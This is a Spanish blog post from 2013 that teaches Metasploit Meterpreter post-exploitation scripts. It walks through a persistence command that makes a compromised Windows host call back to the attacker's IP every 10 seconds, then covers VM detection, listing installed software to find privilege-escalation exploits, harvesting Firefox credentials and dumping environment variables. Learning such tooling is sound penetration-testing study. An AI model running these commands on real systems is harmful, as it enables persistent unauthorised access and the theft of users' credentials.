martes, 8 de enero de 2013

Coqueteando con Metasploit: Meterpreter IV

  Primera entrada del año y cuarta de Meterpreter. Introduciremos el comando run que permite ejecutar scripts realizados para meterpreter ampliando ya la útil y cuantiosa cantidad de posibilidades que ofrece la aplicación.

  A continuación veremos distintos de estos scripts con las mas dispares funcionalidades pero todos útiles de un modo u otro.



Persistencia

  La orden persistance (antecedida por run) permite a meterpreter anclarse al inicio del sistema e intente establecer conexiones con la máquina atacante cada X tiempo.


  El siguiente comando permite que al inicio del sistema comprometido y en intervalos de 10 segundos éste intente conectar con la máquina del atacante:
run persistance -U -p 31337 -r 192.168.0.108 -i 10
donde:

  • -U => Ejecuta meterpreter cuando la víctima accede a su sistema.
  • -p <puerto a la escucha> => El puerto del equipo del atacante en donde se conectará la víctima, es necesario que el atacante tenga un "handler" escuchando en este puerto como vimos en anteriores entregas. 
  • -r <IP atacante> => La dirección IP del atacante.
  • -i <segundos> => El intervalo en segundos en el que la víctima intentará establecer conexión con el atacante.

  Una vez ejecutado, agrega una entrada de meterpreter al registro de Windows en la sección de las aplicaciones que arrancan al inicio.

  Para probar que funciona, cerramos la sesión de meterpreter y ponemos Metasploit a escuchar el puerto especificado antes (con el handler). En breve (en función del intervalo especificado) veremos como la víctima se conecta automáticamente.




¿ Es la víctima una máquina virtual?

  El siguiente script permite saber si el sistema comprometido es o no una máquina virtual. Para ello basta con:
run checkvm



Aplicaciones en el equipo comprometido

  También de forma simple es posible ver las aplicaciones que tiene el equipo comprometido instaladas y su respectiva versión. Esto puede ser muy útil a la hora de buscar determinados exploits para, por ejemplo, escalar privilegios.
run get_application_list




Obtener las credenciales de Firefox

 Para obtener jugosa información del navegador zorruno, existe otro script para hacernos la vida mas facil. Éste se encargará de descargar a nuestro equipo los archivos necesarios para después analizarlos con comodidad.
run post/multi/gather/firefox_creds

Existen gran cantidad de scripts para obtener las credenciales e información útil de muchos programas incluso en distintas versiones de éstos. Su utilización es similar a la de Firefox, basta con buscarlos en "post/multi/gather".



Variables de entorno

  Si se requieren las variables de entorno del equipo comprometido, su obtención es tan rápida como:
run get_env




  Y con esto cerramos la primera entrada del año y relaciona con los scripts de meterpreter. Quedan un par mas relacionadas con run  y cerraremos la subsaga de meterpreter.

  Un saludo, nos leemos en breve ;).

No hay comentarios:

Publicar un comentario en la entrada